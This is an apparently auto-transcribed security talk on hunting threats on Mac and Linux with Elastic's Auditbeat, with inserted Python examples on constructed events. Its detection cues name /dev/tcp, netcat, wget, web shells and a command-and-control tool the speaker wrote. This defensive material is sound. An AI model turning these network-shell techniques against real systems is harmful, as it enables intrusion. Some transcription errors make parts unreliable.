
All right, good morning, first talk of the day, so hope everybody had a little bit of coffee at least. So who am I? InfoSec guy, been on the red team for a while, now on the blue side for the last four or five years or so. I live in Frankfurt, as he said; I'm an American expat. My wife and kids all have three passports apiece, I have only one, but it lets me stay here. So in this talk I'm going to talk to you a little bit about my experiences with Linux and Mac threat hunting. I work inside of InfoSec at Elastic; I'm not on the sales team, I'm on the InfoSec team, so my job is protecting the actual Elastic networks, and of course we do that using Elastic tools.

So Elastic as a company, we're distributed worldwide, 1,600 people, and most of the people work from home. I sit at home working on my laptop all day long, all of our developers work from home, most of our salespeople travel; they'll work from trains, planes, coffee shops, wherever, and it's my job to help protect that. We only have two big physical offices. Endpoints are mostly Mac, a sprinkling of Linux, a sprinkling of Windows in there. Basically when a new hire starts at Elastic they say "what do you want?" and the person picks what they want, so we've got a lot of Macs. The sales team for some reason has a lot of Windows, and the developers have whatever they want, so we've got all sorts of flavors of Linux out there. Our actual infrastructure all lives in the cloud, so we've got infrastructure in all three major cloud providers; it's not just an AWS security shop we've got to deal with. We've got GCP, Azure, we've got IBM Cloud stuff, we've got Tencent Cloud, so it's exciting sometimes. And yes, all of our build infrastructure is publicly facing; about once a week we get a bug bounty person trying to collect a reward for finding our Jenkins, so yes, we know it's out there.

All right, so what's this talk about? We're going to talk about the problem that we're seeing in InfoSec, kind of a solution that we've got from the endpoint, a quick overview of Auditbeat and the new modules that are out and how we use them, and then how you can use them for alerting, incident response, and then threat hunting on Macs and Linux, and then automating a lot of this stuff.

All right, the problem for defenders: it's good for privacy, not so good for a lot of the network defenders. I'm sure a lot of people have felt this out there: you're collecting Zeek data, you're collecting data at your network perimeter level, and just everything keeps getting encrypted. I saw a bunch of Twitter wars back and forth about the pros and cons of DNS over HTTPS at the browser level. Visibility is going down, it's just a fact of life. So you can either sit and moan about visibility going down, you can try to break the encryption at your perimeter on all of your users and really mess with their privacy, which also doesn't go over well with a lot of labor unions over here in Europe, or you can try to find a different solution. Also the other thing with the network logs: if you're looking at 443 traffic, okay, you've got a 443 connection to AWS; there's no context there. It came from a system but you don't have any context, it happens millions of times a day, so nobody's going to actually fire an alert on that. This is just a little quick example of DNS over HTTPS. This is a PowerShell thing I wrote back when I was doing red team type stuff that you can slap into PowerShell Empire, and then all your DNS inside of your command and control payload is encrypted. While everybody's arguing over whether the browser should encrypt it, the attackers are already doing it.

Too many logs, not enough money; this is the other problem. Networks are getting faster, 5G is coming out, everybody's getting faster and faster internet, and of course your applications, your computers are using this faster internet; they're creating more event logs, they're creating more traffic, and so if you try to collect all that your prices just keep going up. Anybody who's tried to collect all this stuff and store it on AWS or store it in some sort of logging server, you start to see your monthly bill just keep going up every single month, and it gets harder and harder to justify that. So I always try to look at, okay, for this data source, how many detections per dollar am I going to get? How many times am I going to find an attacker using this data set and how much is it going to cost? What's the trade-off? Because everybody would love to collect everything, but the accounting people are not going to let you do that.

All right, so the solution, for now at least (we'll see how this goes in the future): endpoint visibility. A lot of people have been talking about this with Sysmon on Windows systems; you can do Auditbeat as well, and that's what this talk is about, on the Linux and the Mac systems. So the key is to get the logs streaming almost in real time off of the endpoints and into a central place; that way you can do all the magic with it, basically. And it gives you context. So once again, TCP 443 to AWS on your firewall, yeah, I don't care, I'm not going to look into it. calc running as root making a TCP 443 connection, that's probably something you need to look into, and without that endpoint data you're not going to have this context.

Okay, so here's the overview of Auditbeat. That top line is directly copy/pasted from the website: lightweight shipper. Lightweight means it doesn't use too much processing power; that all depends on your configuration. You can change your configuration and have it use 100% of one core; I don't recommend that. It contains three modules inside the Auditbeat config: the auditd, the file integrity, and then the system module, which is the new one, which I'm going to spend most of the time talking about.

So the auditd module, Linux only. In the older versions of Auditbeat this was the original way that we were monitoring Linux boxes. It just uses the auditd subsystem, so if you're familiar with auditd you'll be familiar with this module. I've got the pros and cons there. The pro: it uses the same configuration options as auditd. If you've spent any amount of time messing with auditd you may consider that a con, because they're not the most intuitive configuration options. If you just turn auditd on to log everything, it will log every single syscall on the entire system as it happens. That is extraordinarily noisy; you do not want to do that in an enterprise. If you've got a malware sandbox it's great, you can see absolutely everything that malware does; on the sales guy's computer you don't want to do that. So you definitely have to tune your configuration; that's where the cons go. If you turn everything on, a single process start will have 8 to 15 events every time any process runs.

The file integrity module: it's in the name, it monitors the integrity of files and folders. It works on Linux, Mac and Windows; it monitors for changes to folders and changes to attributes of files within folders. So if somebody goes and adds a sticky bit to a file in a folder you'll see that; if they go and modify /etc/hosts you'll see that. Really good for monitoring changes and activity in folders. It also does an initial scan once you first load it and gets the hash of all the files. You can turn that off from a collection point of view if that's going to be too noisy, but if you can afford it, it's great to collect, because then you have an initial file hash of every file in all these critical folders inside your domain.

So the system module, that's the core thing I'm going to be talking about here. Released in Auditbeat 6.6, it just got updated in 7.4, and I always think of it as Sysmon for Linux and Mac. Sysmon is the Windows version, if you're not familiar with it; Microsoft made Sysmon, we made Auditbeat. It collects six different data sets; not all of them are available on Mac because Apple likes to lock things down and not be friendly, but it's better than nothing. Oh yeah, the polling versus, I think I get into that, state versus event. So when you're setting up your configuration file for the system module there are states vs. events. Most of the data sets work on a polling basis, so say every second: show me all of the processes running on the box, and it will show me all the new processes that have started in the last second. So you can imagine the disadvantage: if a process starts and stops in between that second then you're not going to see it in your logs. With network events that's really bad, but we just changed that in 7.4. So the state is, you can say okay, every 12 hours show me all of the installed applications, all of the installed packages, or every seven days; it all depends on how much you want to collect. So when you're configuring Auditbeat pay close attention to the system module's polling versus the state, and that's where I was saying you can tell it to consume a lot of your CPU. Say you really want to see everything: you can tell your process data set, instead of polling every second, to poll every tenth of a second, and you'll start seeing your CPU usage on a core spiking up.

So these are the data sets: host, login, package, process, socket, user, and I'll be going through those.

The host data set is available on all three, Mac, Linux and Windows; it collects the current state information about the host: IP address, all the MAC addresses, the uptime. So this is one of those ones that we like to collect every 12 hours or so, because then you kind of get a snapshot of what's going on. So then if there's any changes to it you can say okay, every 30 minutes show me if the IP address changed, show me if the hostname has changed, show me if the uptime has changed, and so it'll say hey, the box rebooted sometime in the last 30 minutes. Every host gets a unique host ID in the logs, so as the hostname changes the host ID stays the same. So as you're building out your dashboards, things like that, the host ID is the one to pay attention to.

Login data set: this is Linux only, we don't have this on Mac or Windows. Successful and failed logins; it reads utmp. So a nice thing with the all-logged-in users, that'll show you everybody; you'll get spool, you'll get Apache, it's not just actual real human beings, it's all of the users on the Linux system. So you kind of get an idea, and you can whitelist a lot of that stuff if you know that these system accounts are expected to be there. Oh yeah, and for remote IPs you get the SSH logins, you get the remote IP address and then the terminal type as well, so like tty1, tty0, etc.

Package data set, Linux and Mac. This isn't all the applications installed on a system; this just uses dpkg, RPM or Homebrew. So on a Mac system you'll see all of the Homebrew applications installed, but you won't see the actual applications from the App Store that have been installed. I use file_integrity for that, because it just shows me all the folders in the Applications directory, so you get a pretty good idea of what apps are installed on a system. Definitely do not set the polling on this too low, because every single time it's trying to get all the installed packages it runs dpkg or brew and says show me everything that's installed, and then it compares it against the little local database and sends you an alert with any of the new updates. So inventory management, this is a great thing for inventory management. Every month a vulnerability alert comes out, like this version of nginx is vulnerable, so I just go into my dashboard and say okay, show me everybody who's got that version of nginx installed and show me all the versions, and now I can say okay, these three hosts need to go update, they need to run apt-get update.

Process data set: this is the key one you use for the threat hunting. Mac, Linux and Windows. You get the process name, the hash, current directory, a lot of the same stuff you'd expect from Sysmon: the parent information about who started the process. Every process gets a unique entity ID, that's kind of like the process GUID in Sysmon, so then you can use that entity ID to track further execution, if you see that process opening sockets, things like that. So you can have polling as well, so you can say hey, every 30 minutes show me every single process running on this system. Once again, I don't recommend that, especially on user workstations. Maybe if you've got some sensitive equipment out there, maybe you want to run it on your web server just to get an idea, but otherwise if you poll once a second it'll show you all the new stuff.

Socket data set: this is Linux only, does not work on Mac. Monitors network traffic, does what it says. So one of the downsides if you use auditd: you can monitor socket connections, socket creations, but with auditd on Linux it only shows you one side of the connection. So it'll say incoming connection from this IP address, or outgoing connection with this source IP, and you don't get that full connection information in a single event; you have to really work to get that all together in auditd. So with the socket data set it gets you all that information, and then in 7.4 we completely retooled it, so now it uses kprobes, so there's no more polling, you get all the events, and it shows all the flow information. So you get packet and byte counts; as soon as that connection is over you get all that data you'd come to expect from Bro, but you've got it on the host with all of the process information to enrich it, so you know exactly who started it, how many packets they sent, where they sent it, etc.

User data set, Linux only, does what it says; it also shows when passwords are changed, which is kind of nice to see. Once you've been collecting this data for a while you can say when is the last time this user changed their password.

All right, so now I'm going to talk a bit about configuring Auditbeat, because if you just take Auditbeat, use the default configuration and deploy it to your entire domain, you're going to have a bad day. You need to tune everything. So it gives you a YAML file; inside of this file you can configure exactly which modules are run, exactly how often they poll, you can whitelist, you can drop events, there's lots and lots of configuration. Like I started into this for all the workstations and I thought I was doing pretty good, and then our cloud guys showed me their config, and I think it was 500 lines long with all the whitelisting they do and exclusions and syscalls that they collect, so some people know it a little better than others. The config file controls everything about Auditbeat, basically.

So this is one of my favorite processors: don't collect something if you're not going to use it. We're doing this on all of our endpoints, so we've got privacy concerns, we've got employees all around the world with different concerns, so we don't collect browser data. So I say okay, drop all 443 traffic from Chrome. So you can do ORs and ANDs, and you can have as many of those as you want. You usually just start out with one OR statement: if it matches any of these, drop it. So if it's an existing process, process error, process stop, anything that's a field in Elastic you can just do that, like process name, destination.port 443, destination IP; it goes in pretty easily. So you can just make a whole list of events that you want to filter. And what we try to do, about once a month, we go in and look at the config and say okay, what is unnecessary noise in my cluster right now? I've got this one system creating this error log, it's sending me a hundred thousand events a day; okay, well let's push that so it doesn't show up in my cluster. So then I stop getting billed for that and everybody's happy, because now I don't have noise in my system, I'm not paying for it at the cluster level, it just gets dropped. And the ORs and the ANDs, you can nest those if you want; you can have some pretty complex drop statements.

These are some metadata processors. So the top one: by default the process data set won't include all of the parent process information; it'll just have the parent process PID. So you can do this, and now as every process comes in you get all of the process information as well as all of that process's parent information. So you'll get the parent process current working directory, the parent process command line, etc., so then in a single event you have a lot more context in order to make your decisions. The cloud metadata one, so, interesting note: when you turn on the cloud metadata it says okay, I'm in the cloud but I have no idea which cloud I'm in, so it will try to talk to that AWS service and get information about which cloud it's in, the 169 address or whatever that IP address is on AWS. So if you see your Auditbeat making connections out to this, don't worry, that's actually okay. But because it doesn't know which cloud it's in, first it does a discovery, so you may have Auditbeat deployed in AWS and you'll see it making DNS queries to Azure, to IBM, to all these different cloud services, to Tencent, because that's a big cloud provider in the world. So that may freak out some people in the U.S., to say hey, my systems are making DNS queries to Tencent, or vice versa. So just one of those things to consider. And the host metadata, that can add a lot to your storage if you do that, but it's really nice to have, so then every single event has all of the host information as well, so you get the host ID on every single event. That can make for some really nice dashboards, so then you just pop the host ID into your search bar and bam, you've got every event for that host.

The queue: this is something that I learned about, and it is very important if you have a laptop. So this basically says okay, store all the events in a nice little file when you're offline, when you can't talk to the internet; as soon as you plug back in, boom, it sends all the events, and you can control that buffer as to how many events it sends at once. I put it at 10 megs because in the grand scheme of things that's not too much; if you have some users on some really bad network connections they may complain about that.

Things to consider: if you're deploying Auditbeat out to a bunch of laptops, anybody with root access can modify the config, so do not put any sensitive information in there. Don't put a password to your Elasticsearch cluster in there. What I recommend, and what we do, is we ship it to Logstash.
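Added example, not code from the talk and not from the Beats project: a small Python dry-run of Auditbeat `drop_event` rules. It re-implements the documented semantics of Beats processor conditions (`equals`, `contains`, `regexp`, `range`, and `and`/`or`/`not` over dotted field paths) so that a drop list can be tested against exported events, and the volume it removes counted, before it goes into `auditbeat.yml`. The `DROP_WHEN` tree mirrors a `when:` block (drop Chrome TLS flows, expected system-account logins, a noisy updater); the events, the updater path and the account list are constructed for the demo.

```python
"""Dry-run Auditbeat drop_event conditions offline (added example)."""
import re
from typing import Any, Dict, List, Tuple

Event = Dict[str, Any]


def get_field(event: Event, path: str) -> Any:
    """Resolve a dotted ECS path such as 'process.name' in a nested event dict."""
    cur: Any = event
    for part in path.split("."):
        if not isinstance(cur, dict) or part not in cur:
            return None
        cur = cur[part]
    return cur


def matches(cond: Dict[str, Any], event: Event) -> bool:
    """True if the event satisfies a Beats-style 'when' condition tree."""
    if len(cond) != 1:
        raise ValueError("each condition node must hold exactly one operator")
    op, body = next(iter(cond.items()))
    if op == "and":
        return all(matches(c, event) for c in body)
    if op == "or":
        return any(matches(c, event) for c in body)
    if op == "not":
        return not matches(body, event)
    if op == "equals":
        return all(get_field(event, f) == v for f, v in body.items())
    if op == "contains":  # substring match; non-string fields never match
        return all(isinstance(get_field(event, f), str) and v in get_field(event, f)
                   for f, v in body.items())
    if op == "regexp":
        return all(isinstance(get_field(event, f), str)
                   and re.search(v, get_field(event, f)) is not None
                   for f, v in body.items())
    if op == "range":  # numeric bounds: gt / gte / lt / lte
        checks = {"gt": lambda a, b: a > b, "gte": lambda a, b: a >= b,
                  "lt": lambda a, b: a < b, "lte": lambda a, b: a <= b}
        for f, bounds in body.items():
            val = get_field(event, f)
            if isinstance(val, bool) or not isinstance(val, (int, float)):
                return False
            if not all(checks[k](val, b) for k, b in bounds.items()):
                return False
        return True
    raise ValueError(f"unsupported condition operator: {op}")


# Mirror of a drop_event 'when:' block (constructed rules, not Elastic's config).
DROP_WHEN: Dict[str, Any] = {
    "or": [
        {"and": [  # browser TLS flows: privacy, and no detection value for us
            {"equals": {"event.dataset": "socket"}},
            {"equals": {"process.name": "Google Chrome"}},
            {"equals": {"destination.port": 443}},
        ]},
        {"and": [  # expected system accounts in the login data set
            {"equals": {"event.dataset": "login"}},
            {"regexp": {"user.name": r"^(apache|www-data|spool|_spotlight)$"}},
        ]},
        # a known-noisy updater (constructed path)
        {"contains": {"process.executable": "/Keybase.app/Contents/SharedSupport/bin/updater"}},
    ]
}


def apply_drop_list(events: List[Event], when: Dict[str, Any]) -> Tuple[List[Event], int]:
    """Return (kept events, number dropped), as the agent-side processor would."""
    kept = [e for e in events if not matches(when, e)]
    return kept, len(events) - len(kept)


def projected_daily_drop(events: List[Event], when: Dict[str, Any], hours_sampled: float) -> float:
    """Scale a sampled window to an events-per-day estimate of what the rules remove."""
    _, dropped = apply_drop_list(events, when)
    return dropped * 24.0 / hours_sampled


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS: List[Event] = [
    {"event": {"dataset": "socket"}, "process": {"name": "Google Chrome"},
     "destination": {"port": 443, "ip": "52.0.0.1"}},
    {"event": {"dataset": "socket"}, "process": {"name": "calc"}, "user": {"name": "root"},
     "destination": {"port": 443, "ip": "52.0.0.2"}},
    {"event": {"dataset": "login"}, "user": {"name": "www-data"}},
    {"event": {"dataset": "login"}, "user": {"name": "alice"}, "source": {"ip": "203.0.113.9"}},
    {"event": {"dataset": "process"}, "process": {"name": "updater",
     "executable": "/Applications/Keybase.app/Contents/SharedSupport/bin/updater"}},
    {"event": {"dataset": "process"}, "process": {"name": "python", "executable": "/usr/bin/python"}},
]

if __name__ == "__main__":
    kept, dropped = apply_drop_list(SAMPLE_EVENTS, DROP_WHEN)
    print(f"dropped {dropped}, kept {len(kept)}")
    for e in kept:
        print(e)
```

Note that the `calc` as root 443 flow survives while the Chrome flow is dropped: the rule keys on the process, not the port, which is the whole point of having process context on the host. Run the same list over a day's export to put a number on the monthly noise review.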
So then, yes, you have to deploy the certificate so that it can talk to Logstash, and an attacker could get that and flood your Logstash with bad events, but they can't log into your cluster. So there's definitely a trade-off there.

All right, going to get into threat hunting, alerting and incident response. So I like to break down what I can do with this information into three different categories, because with host-based events there's a lot you can do with them, there's a lot of information there, and sometimes it gets overwhelming where to start. So you can break it down, and if you have a large enough InfoSec team you can break this down into multiple teams as well, so that each person focuses on their own thing. So "real-time" alerting, I put that in quotes, because it's polling, because boxes are offline and you're using Watchers; it's not real time, but it's close enough. Threat hunting, that definitely is the big category that I like to do, and then the incident response and forensics, timelines, I'll get into that a bit.

So alerting: Watchers in Elastic. You can use Watchers to basically run a query every X number of seconds, minutes, hours, and then with any results to that search query you can do whatever you want at that point. So you can detect living off the land that AV missed. Let's say you do a search query to say hey, every time this command is run, that your antivirus doesn't care about at all but I care about because in my network I know this is bad, so I can make my custom antivirus signatures like this and get alerts with it. So with Watchers, there's a ton of Sigma rules out there, I'm sure people in this room have heard of Sigma. SOC Prime has a nice tool, uncoder.io, to take those and convert them into Watcher rules pretty quick and easy, and then from there you can have your alerting, which is basically a webhook. So we send ours to Slack and TheHive in InfoSec at Elastic; you can do whatever you want with them. We actually were discussing an Alexa skill that will play a sound every time an alert fires, which my family would very quickly not like. One person mentioned he'd like to think of the severity level of alerts as whine, growl and bark, and that was the Alexa skill we were discussing; yeah, it would get turned off very quickly.

Something to consider when you're doing this type of thing: ingest time versus actual event time. So when you write a Watcher you have to specify, okay, look at everything with a timestamp in the last 30 minutes and then show me if there's any new hits. So which timestamp do you look at? Because a lot of events, do you have the timestamp when they actually happened, or when the event hit your cluster? We use when the event hit the cluster, because let's say I take my laptop and I fly to California, which is a 10-hour flight or something, and I didn't pay for Wi-Fi, so I'm offline while I'm on the flight. I go fall asleep, somebody uses the evil charging cable attack or something and adds some malware to my system. I land in California, finally get to my hotel a few hours later, and now I connect to the internet. If my Watcher is only looking at events that actually happened in the last 30 minutes, it'll miss that entire flight. So you have to look at when it actually hits your cluster, the ingest time. That little code there, that's the one line it takes in your Logstash config or your ingest config on Elastic to add that, so now you've got the actual time when the event happened versus the time when it hits your cluster.
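Added example, not from the talk and not Elastic's Watcher code: a Python simulation of the offline-laptop case above, using constructed events. The mid-flight process start carries an `@timestamp` from when it ran, but its `event.ingested` stamp is hours later, when the spool finally drains into the cluster; a look-back window keyed on `@timestamp` misses it, one keyed on `event.ingested` catches it. The field name `event.ingested` is assumed here to be what the ingest-side `set` processor fills from `{{_ingest.timestamp}}`; the times, host and process names are made up.

```python
"""Watcher look-back window keyed on event time vs ingest time (added example)."""
from datetime import datetime, timedelta
from typing import Any, Dict, List, Tuple

Event = Dict[str, Any]


def parse_ts(value: str) -> datetime:
    """Parse an ISO-8601 UTC stamp with a trailing Z, as Elasticsearch emits it."""
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def get_field(event: Event, path: str) -> Any:
    """Resolve a dotted path such as 'event.ingested' in a nested event dict."""
    cur: Any = event
    for part in path.split("."):
        if not isinstance(cur, dict) or part not in cur:
            return None
        cur = cur[part]
    return cur


def in_window(events: List[Event], field: str, now: datetime, window: timedelta) -> List[Event]:
    """The watcher's '<field> in the last N minutes' clause applied to a list of events."""
    start = now - window
    return [e for e in events if start <= parse_ts(get_field(e, field)) <= now]


def ingest_lag(event: Event) -> timedelta:
    """How long the event sat on the endpoint before it reached the cluster."""
    return parse_ts(get_field(event, "event.ingested")) - parse_ts(get_field(event, "@timestamp"))


def stale_events(events: List[Event], threshold_seconds: int = 3600) -> List[Event]:
    """Events whose spool-to-cluster delay exceeds the threshold (worth their own review)."""
    return [e for e in events if ingest_lag(e).total_seconds() > threshold_seconds]


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS: List[Event] = [
    # routine login while online; arrived within seconds
    {"@timestamp": "2019-11-05T04:00:00Z", "event": {"ingested": "2019-11-05T04:00:04Z", "dataset": "login"},
     "host": {"id": "laptop-1"}, "user": {"name": "alice"}},
    # process start mid-flight with the laptop offline; spooled to disk, shipped from the hotel
    {"@timestamp": "2019-11-05T11:30:00Z", "event": {"ingested": "2019-11-05T23:45:10Z", "dataset": "process"},
     "host": {"id": "laptop-1"}, "process": {"name": "curl", "parent": {"name": "osascript"}}},
    # process start at the hotel, online again
    {"@timestamp": "2019-11-05T23:44:00Z", "event": {"ingested": "2019-11-05T23:44:03Z", "dataset": "process"},
     "host": {"id": "laptop-1"}, "process": {"name": "Slack", "parent": {"name": "launchd"}}},
]

NOW = parse_ts("2019-11-05T23:59:00Z")   # when the watcher fires
WINDOW_MINUTES = 30


def compare_windows(events: List[Event] = SAMPLE_EVENTS, now: datetime = NOW,
                    window_minutes: int = WINDOW_MINUTES) -> Tuple[List[str], List[str]]:
    """Process names a watcher sees keyed on @timestamp vs keyed on event.ingested."""
    window = timedelta(minutes=window_minutes)
    by_event_time = [e["process"]["name"] for e in in_window(events, "@timestamp", now, window)
                     if "process" in e]
    by_ingest_time = [e["process"]["name"] for e in in_window(events, "event.ingested", now, window)
                      if "process" in e]
    return by_event_time, by_ingest_time


if __name__ == "__main__":
    seen_by_event, seen_by_ingest = compare_windows()
    print("keyed on @timestamp:   ", seen_by_event)
    print("keyed on event.ingested:", seen_by_ingest)
    for e in stale_events(SAMPLE_EVENTS):
        print("late arrival:", e["process"]["name"], "lag", ingest_lag(e))
```

Keying the window on ingest time is what makes the curl-from-osascript start visible at all; the lag itself is a useful second signal, since a batch of hours-old events from one host is exactly the "this laptop was offline" pattern worth a closer look.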
all of the data all ready to go then why do you need to go pull a hard drive so you can make all these dashboards ahead of times I'm not gonna go in too deep on this I actually gave a talk on this with the Windows systems at b-sides Munich so that's the link at the bottom for that video that Cooper was nice enough to get video you can basically make the the dashboards and timeline so that when somebody has a question when you have an alert that fires and you're wondering this doesn't look right to you instead of going and you know getting physical access to a system to go investigate it you just go look at the dashboard and
you can usually answer your questions threat hunting so threat hunting based on the assumption you've been compromised do you assume compromise and you say the attackers are in a network and I haven't caught them now what psycho process it's just it never ends you're just constantly adapting and sometimes you do the same hunt you know multiple times a year because you know maybe the attackers came in during that time my recommendations keep each hunt narrowly focused as possible sometimes people say I'm gonna hunt for bad guys and that's okay you know hunt for bad guys doing one specific thing and then you know once you've determined whether they have or have not and that data in your logs or
not then you move on to the next one and you or you adapt and you say hey I wasn't able to complete this hunt because I don't have this data so what do I need to do in order to get this data into my cluster and into my hands so that I can do this investigation I'm the more data you have the better once again it's a balance because data costs money logging costs money so you got to balance that out with with all your needs there oh yeah on that last line if you had the more information you have in a single cluster or viewable by a single clock stir the the better it is if you have to
go to one place for your endpoint protection in one place for your network logs and another place for your proxy logs another place for your like AWS logins that it just you cannot get good visibility that way and everything takes longer all right so threatened threatened ting on Macs so this was kind of an experience for me because I've been a Windows person for the last five or six years my number one programming language before this was PowerShell so now I'm you know Mac forensics Mac investigation focused so Mac they lock down the systems which is good for security not so good for visibility you don't get socket you don't get login you don't get
user information we're working on that just bought in games so now they've got an agent for it so maybe that'll help us out a bit there's also relatively few write-ups about max about compromises about malware come you know there's objective-c that's like the one website I know of that has a pretty good collection of Mac based malware and attacks so then you can kind of go and say okay let me look at this attack and how would I detect that if you know let me look this next one how would I detect that if that if somebody came at us with this attack all right so the big thing that I've been looking for with the Mac
data so you don't have the socket information so it's kind of harder finding like the beaconing type stuff but you can find for a you can do a pretty good job of looking for persistence because Mac has it's only got a few places for persistence and a fairly well-documented so you can watch for changes to those so then you know the big thing is the launch agents the launch Damons some of them run as root some of run as users every time you not install a new app like if it starts when you boot up it installed a launch agent or a launch daemon you install it most of the time I've got alerts for all of
these when something new gets stalled and most of the time it's key base getting installed or slack getting installed or something like that but that's fine I'm ok with that because I can I can sift through those and then or I can just drop those specific processes in my config and then I see everything else so yeah I monitor them with the file integrity monitoring as well as watch for any processes where those folders are in the arguments this is just a quick config Oh know if you can read that so you can see like the launch control load that's that's the command that you run to to actually load a process so that it gets loaded every
time on start or you can just use VI to edit the the plist file and the next time it boots up it'll get started on its own so that's why you want to monitor for both this was just you know quick snapshot of like this is like the last seven days so we've got 1500 systems and this is over the last seven days so you can see it's not too noisy as far as alerts go once you tune out like the actual write noise in and I think I'll probably add the key base upload you know key base updater to my whitelist so I don't see that again kernel extensions so texts so this got
changed in Catalina so if you've updated the Catalina then this doesn't quite apply but they didn't Mack didn't you know communicate that well with a lot of the developers so they think they still support it but they're saying on the next version they're gonna cut it off completely but a kernel extension so like the kernel extension I see most often is Google Drive so people install Google Drive so that when you open up finder you can actually see your Google Drive folders in within finder that's a an extension of the actual kernel of the operating system you know so these as you can imagine these you know could probably be done as a rootkit type thing
it it changes how a lot of the functionality of the actual computer works you say you watch that system library extensions folder you can do text yeah so kext load is the process that will actually load it you can do text load list if you want to see all the processes or all the kernel extensions currently loaded on your box this there's a command you can run on the terminal if your root it'll show you all the kernel extensions so it's a big one that you want to watch for and also be prepared to white light the white list noise you know certain environments like Google Drive okay everybody's got that in minot environment let me get rid
of that so Tron it you know who Mack under the hood is a Linux system it has cron installed the only application I've seen using cron on our network is coop control so our kubernetes developers they're constantly setting off everybody else I I don't see any cron execution on these are the other 1,600 so Mac system so it's it's there it works it will start things that boot up but it's not used that often anymore definitely wants one of those things to keep an eye on defaults it sets the defaults took me it is a bit of confusion when we started a conversation on this you know I want to look at the defaults okay well what do
you mean the actual command is called defaults and it changes the defaults so if you do defaults read it's a huge law it'll spit out a big JSON with all the defaults on your Mac and you can write it's a just a plist file you know you can take a pee list write it to that and now your defaults on your Mac have changed and this can be used to say okay every time the you know every time you start up run this command one of those things to keep an eye out on private at sea it's kind of like the Etsy folder on Linux but Mac they had to be different they put it under private Etsy so
definitely there's a lot of stuff in there that can be used to boot up or to cause execution on startup so you're like bash RC system-wide bash RC file so every time somebody starts up a terminal this gets run you know man kampf you know you got users that are developers you had you modify this every time somebody runs a man command to look up some documentation they execute malware a lot of interesting ways you can do this so watch for changes in there it shouldn't be changing a lot so just keep an eye on that malware execution so we watch for sudou at any time sudo gets run on a box because we're you know all of our engineers are
out there and a lot of them have Macs, we see this a lot and we've done a lot of whitelisting on this. But if you've got, you know, let's say all of your marketing team has Macs, you shouldn't see sudo being run on the marketing team's boxes that often. So this is one of those things that you just, you've got to monitor. This comes into the threat hunting, like you don't want to have an alert waking you up or barking at your Alexa on this one, but it's one of those things that you review once a week.

Python: if you look at, you know, you look at Objective-C, you look at a lot of the Mac malware, it uses Python for execution. If you look at PowerShell Empire, they've got a Python version that works on Macs for command and control, you know, if you want to do some red teaming, pen testing on Macs. So keep an eye out on Python. Once again, in a network full of developers that gets tricky, so it's just, machine learning can help with that, where if you're looking for strange execution of Python, like you see the same thing getting executed over and over again, and now all of a sudden you see this system that's never run Python, or this Python command has never been run in your domain, that can really help with a lot of that stuff.

And then the big one: parent-to-child process relationships. If you see Microsoft Word spawning a terminal and then suddenly, you know, a chain of events leading to it modifying /etc/hosts, yeah, that lineage, that's one of the key indicators for compromise.

Malicious apps: this is one of the challenging ones. If you look at most of the Mac exploits and vulnerabilities, you know, the compromises, it's somebody installed an app that they shouldn't install, and Mac does a fairly good job of locking it down, and they've even made it harder now with Catalina to install third-party apps, which I heard like even OpenOffice now is not installing or not working right on the newest version of Mac because of this. So it is what it is, but from a security point of view that's better, because it makes it harder for our users to install a malicious app. But the big thing to look for is look for rare apps installed on your fleet, and then when you see an app, do some research. We have people all around the world, we have employees in China, you know, Australia, everywhere, and so I definitely see some local apps that, you know, like hey, oh, you know, this one's common in Korea, I've never seen it anywhere else. So, you know, in a worldwide type organization you start to learn all these local apps that
everybody likes.

All right, threat hunting on Linux. This, yeah, this is my life on the Linux systems. So get familiar with all the Linux admin queues. The first place I go when I see a Linux alert is to our Linux admins' GitHub, because we put in like issues every time they're doing maintenance or changing things or changing configurations, and I just do a search for that system that fired the event, because 99% of the time it's in there. If not, I look at the user name or who's logged into that system and I Slack message them, because if you, you know, if you set off all the alarms, hey, I've been infected, there's an APT, every time you see something crazy on Linux, you're gonna, you know, very quickly be the boy who cried wolf and nobody's going to talk to you.

So threat hunting on Linux, exploit detection. So a lot of this is straight out of Sigma rules, so /dev/tcp, look for, you know, web shells, things like that. So most of the Linux systems I monitor are part of our development infrastructure in the cloud and not so much on the workstations, so you don't see netcat running that often on those systems, you don't see wget unless some command or script is running it, and any whitelist that looks for strange things, this is really the key to the Linux box, the Linux threat hunting.

The machine learning, that's one of the things I wanted to talk about. It's really good in an environment where you've got lots and lots of containers and you're constantly, you stand up a new container, it does stuff and then it tears down, and it's this ephemeral type action. You see the same commands being run over and over and over again, so the machine learning is pretty good at saying hey, this just gets to be part of the normal baseline, and human activity stands out like a sore thumb. So your machine learning says hey, somebody was logged into this box at this time, and then that's where I go over to the Linux admin queue and say okay, what were they doing? Okay, yep, somebody was actually logged into the system.

Focused alerting, definitely. So that link there, that's a Sigma rule, the Linux suspicious commands, it's like 20 different commands that are all suspicious, and that's great and, you know, I used that, but I really recommend breaking it up into individual rules, because if that comes off as one alert, like hey, a suspicious command was run on a Linux box, that's, okay, thanks. You can break your alerts up so your Watchers show you exactly what the rule was, and it's my personal preference, it's better to have 20 rules as opposed to one.

All right, just an example of stuff I see in our network. You know, okay, yeah, that looks bad, you know, that specific command that installs missed, so yeah, okay, cool. You know, this is the life of threat hunting on Linux, you see some crazy things and then you just gotta verify with admins. A lot of times the admins and the attackers are doing the exact same type of commands, and yes, context is key. So look at the process, look at the surrounding events. If you can see an admin logged in and they updated Docker, they updated a bunch of things like that, and then they ran the suspicious command, usually the attackers don't log in and update your Docker images and update other things before running their suspicious command.

All right, so conclusion. Endpoint visibility, that's from an InfoSec threat hunting point of view. I started out doing the network visibility stuff and I was very quickly frustrated with how much I didn't know, and now with the endpoint visibility it's very quick and easy to answer your questions, to get that context, so that every time you see something weird you're not, you know, waking everybody up for false alarms. But the NetFlow, all that stuff, if you can have all that stuff in the same location, then now you've got all the context, you
can say okay, this network connection seen here, you know, was this process and that was bad. Now, you know, quickly expand out, say show me all of the other systems and processes in my entire domain that made that connection. And yeah, the obligatory we are hiring, just like everybody else. Like I said, Elastic, we don't care where you live, so you can, you know, sit in your house and work for us.

So down to the question section. Do we have any questions from the audience? Nope? Yes.

Hello, thank you for your talk. For the host ID, which is persistent even if you change your host name, does it work over reinstalls, or what is it actually based on, what generated the host ID?

